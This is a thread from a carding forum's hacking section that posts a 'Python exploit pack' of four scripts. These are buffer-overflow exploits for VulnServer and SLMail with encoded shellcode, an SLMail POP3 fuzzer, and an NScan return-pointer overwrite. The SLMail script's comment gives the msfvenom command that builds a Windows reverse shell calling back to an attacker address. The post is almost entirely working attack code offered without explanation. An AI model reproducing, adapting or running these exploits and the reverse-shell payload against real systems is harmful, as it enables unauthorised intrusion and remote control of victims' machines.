Go Back   Carder.life > [en] International Forum > Hacking & Coding
Reload this Page Python Exploits 2019

CARDER.MARKET - CARDING FORUM FOR PROFESSIONAL CARDERS


 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 02-13-2025, 04:38 PM
Elusive's Avatar

Elusive Elusive is offline
Banned
Join Date: Jun 2023
Posts: 1
Default

Python exploit pack
VulnServer
Code:
#!/usr/bin/python

import socket

import struct

shellcode =  ""

shellcode += "\xb8\xc5\x97\xc9\x70\xdb\xc1\xd9\x74\x24\xf4\x5b"

shellcode += "\x2b\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\x06"

shellcode += "\x93\x2b\x85\x74\x74\x29\x66\x84\x85\x4e\xee\x61"

shellcode += "\xb4\x4e\x94\xe2\xe7\x7e\xde\xa6\x0b\xf4\xb2\x52"

shellcode += "\x9f\x78\x1b\x55\x28\x36\x7d\x58\xa9\x6b\xbd\xfb"

shellcode += "\x29\x76\x92\xdb\x10\xb9\xe7\x1a\x54\xa4\x0a\x4e"

shellcode += "\x0d\xa2\xb9\x7e\x3a\xfe\x01\xf5\x70\xee\x01\xea"

shellcode += "\xc1\x11\x23\xbd\x5a\x48\xe3\x3c\x8e\xe0\xaa\x26"

shellcode += "\xd3\xcd\x65\xdd\x27\xb9\x77\x37\x76\x42\xdb\x76"

shellcode += "\xb6\xb1\x25\xbf\x71\x2a\x50\xc9\x81\xd7\x63\x0e"

shellcode += "\xfb\x03\xe1\x94\x5b\xc7\x51\x70\x5d\x04\x07\xf3"

shellcode += "\x51\xe1\x43\x5b\x76\xf4\x80\xd0\x82\x7d\x27\x36"

shellcode += "\x03\xc5\x0c\x92\x4f\x9d\x2d\x83\x35\x70\x51\xd3"

shellcode += "\x95\x2d\xf7\x98\x38\x39\x8a\xc3\x54\x8e\xa7\xfb"

shellcode += "\xa4\x98\xb0\x88\x96\x07\x6b\x06\x9b\xc0\xb5\xd1"

shellcode += "\xdc\xfa\x02\x4d\x23\x05\x73\x44\xe0\x51\x23\xfe"

shellcode += "\xc1\xd9\xa8\xfe\xee\x0f\x7e\xae\x40\xe0\x3f\x1e"

shellcode += "\x21\x50\xa8\x74\xae\x8f\xc8\x77\x64\xb8\x63\x82"

shellcode += "\xef\x07\xdb\x8c\xe2\xef\x1e\x8c\xe3\x7f\x97\x6a"

shellcode += "\x71\x90\xfe\x25\xee\x09\x5b\xbd\x8f\xd6\x71\xb8"

shellcode += "\x90\x5d\x76\x3d\x5e\x96\xf3\x2d\x37\x56\x4e\x0f"

shellcode += "\x9e\x69\x64\x27\x7c\xfb\xe3\xb7\x0b\xe0\xbb\xe0"

shellcode += "\x5c\xd6\xb5\x64\x71\x41\x6c\x9a\x88\x17\x57\x1e"

shellcode += "\x57\xe4\x56\x9f\x1a\x50\x7d\x8f\xe2\x59\x39\xfb"

shellcode += "\xba\x0f\x97\x55\x7d\xe6\x59\x0f\xd7\x55\x30\xc7"

shellcode += "\xae\x95\x83\x91\xae\xf3\x75\x7d\x1e\xaa\xc3\x82"

shellcode += "\xaf\x3a\xc4\xfb\xcd\xda\x2b\xd6\x55\xea\x61\x7a"

shellcode += "\xff\x63\x2c\xef\xbd\xe9\xcf\xda\x82\x17\x4c\xee"

shellcode += "\x7a\xec\x4c\x9b\x7f\xa8\xca\x70\xf2\xa1\xbe\x76"

shellcode += "\xa1\xc2\xea"

payload = 'A' * 2006 + struct.pack("<L",0x625011AF) + '\x90' * 16 + shellcode

try:

    print "\nSending Random Bytes..."

    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    connect=s.connect(('192.168.0.24',9999))

    s.recv(1024)

    s.send(('TRUN .' + payload + '\r\n'))

    s.recv(1024)

    s.send('EXIT\r\n')

    s.close()

    print "\nExploit Done. Checking..."

except:

    print "Could not connect to 9999 for some reason..."

SLMail
Code:
#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Address=5F4A358F Message=0x5f4a358f: '\xff\xe4' |  {PAGE_READONLY} [SLMFC.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v6.00.8063.0 (C:\Windows\system32\SLMFC.DLL)

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.13 LPORT=4444 -f python -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

# Payload size: 351 bytes

shellcode =  ""

shellcode += "\xd9\xc9\xb8\x2d\xa8\x1e\xe6\xd9\x74\x24\xf4\x5b"

shellcode += "\x33\xc9\xb1\x52\x31\x43\x17\x03\x43\x17\x83\xc6"

shellcode += "\x54\xfc\x13\xe4\x4d\x83\xdc\x14\x8e\xe4\x55\xf1"

shellcode += "\xbf\x24\x01\x72\xef\x94\x41\xd6\x1c\x5e\x07\xc2"

shellcode += "\x97\x12\x80\xe5\x10\x98\xf6\xc8\xa1\xb1\xcb\x4b"

shellcode += "\x22\xc8\x1f\xab\x1b\x03\x52\xaa\x5c\x7e\x9f\xfe"

shellcode += "\x35\xf4\x32\xee\x32\x40\x8f\x85\x09\x44\x97\x7a"

shellcode += "\xd9\x67\xb6\x2d\x51\x3e\x18\xcc\xb6\x4a\x11\xd6"

shellcode += "\xdb\x77\xeb\x6d\x2f\x03\xea\xa7\x61\xec\x41\x86"

shellcode += "\x4d\x1f\x9b\xcf\x6a\xc0\xee\x39\x89\x7d\xe9\xfe"

shellcode += "\xf3\x59\x7c\xe4\x54\x29\x26\xc0\x65\xfe\xb1\x83"

shellcode += "\x6a\x4b\xb5\xcb\x6e\x4a\x1a\x60\x8a\xc7\x9d\xa6"

shellcode += "\x1a\x93\xb9\x62\x46\x47\xa3\x33\x22\x26\xdc\x23"

shellcode += "\x8d\x97\x78\x28\x20\xc3\xf0\x73\x2d\x20\x39\x8b"

shellcode += "\xad\x2e\x4a\xf8\x9f\xf1\xe0\x96\x93\x7a\x2f\x61"

shellcode += "\xd3\x50\x97\xfd\x2a\x5b\xe8\xd4\xe8\x0f\xb8\x4e"

shellcode += "\xd8\x2f\x53\x8e\xe5\xe5\xf4\xde\x49\x56\xb5\x8e"

shellcode += "\x29\x06\x5d\xc4\xa5\x79\x7d\xe7\x6f\x12\x14\x12"

shellcode += "\xf8\xdd\x41\x1c\xf5\xb5\x93\x1c\x14\x1a\x1d\xfa"

shellcode += "\x7c\xb2\x4b\x55\xe9\x2b\xd6\x2d\x88\xb4\xcc\x48"

shellcode += "\x8a\x3f\xe3\xad\x45\xc8\x8e\xbd\x32\x38\xc5\x9f"

shellcode += "\x95\x47\xf3\xb7\x7a\xd5\x98\x47\xf4\xc6\x36\x10"

shellcode += "\x51\x38\x4f\xf4\x4f\x63\xf9\xea\x8d\xf5\xc2\xae"

shellcode += "\x49\xc6\xcd\x2f\x1f\x72\xea\x3f\xd9\x7b\xb6\x6b"

shellcode += "\xb5\x2d\x60\xc5\x73\x84\xc2\xbf\x2d\x7b\x8d\x57"

shellcode += "\xab\xb7\x0e\x21\xb4\x9d\xf8\xcd\x05\x48\xbd\xf2"

shellcode += "\xaa\x1c\x49\x8b\xd6\xbc\xb6\x46\x53\xcc\xfc\xca"

shellcode += "\xf2\x45\x59\x9f\x46\x08\x5a\x4a\x84\x35\xd9\x7e"

shellcode += "\x75\xc2\xc1\x0b\x70\x8e\x45\xe0\x08\x9f\x23\x06"

shellcode += "\xbe\xa0\x61"

payload = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode

try:

    print "\nSending random bytes..."

    s.connect(('192.168.0.26', 110))

    data = s.recv(1024)

    s.send('USER legit' + '\r\n')

    data = s.recv(1024)

    s.send('PASS ' + payload + '\r\n')

    data = s.recv(1024)

    s.close()

    print "\nExploit Done.. Checking..?"

except:

    print "Could not connect to POP3 for some reason..."

SLMail Fuzzer
Code:
#!/usr/bin/python

import socket

# To create array of buffers 1 to 5900 with space of 200.

buffer=["A"]

counter=100

while len(buffer) <= 30:

	buffer.append("A"*counter)

	counter=counter+200

for string in buffer:

	print "Fuzzing PASS with %s bytes" % len(string)

	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	connect=s.connect(('192.168.0.19',110))

	s.recv(1024)

	s.send('USER test\r\n')

	s.recv(1024)

	s.send('PASS ' + string + '\r\n')

	s.send('QUIT\r\n')

	s.close()

NScan
Code:
import struct

junk = '\x41'*997 # 997 bytes 

eip = struct.pack("<L",0x7c836a78) # use little-endian to address 0x7c836a78 # call esp # kernel32.dll

nops = '\x90'*10

shellcode = "\x31\xC9"                  # xor ecx,ecx

shellcode += "\x51"                     # push ecx

shellcode += "\x68\x63\x61\x6C\x63"     # push 0x636c6163

shellcode += "\x54"                     # push dword ptr esp

shellcode += "\xB8\xC7\x93\xC2\x77"     # mov eax,0x77c293c7

shellcode += "\xFF\xD0"                 # call eax

payload = junk + eip + nops + shellcode # combine exploit with nop sled and working shellcode

try:

    f = open("C:\\Documents and Settings\\user\\Desktop\\log\\dig\\payload.txt","wb")

    f.write(payload)

    f.close()

    print "\nNScan Saved Return Pointer Overwrite Exploit"

    print "\nExploit written successfully!"

    print "Buffer size: " + str(len(payload)) + "\n"

except Exception, e:

    print "\nError! Exploit could not be generated, error details follow:\n"

    print str(e) + "\n"
 

Tags
NULL

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Forum Jump




All times are GMT. The time now is 04:41 AM.

Contact Us - Carder.life - Archive - Top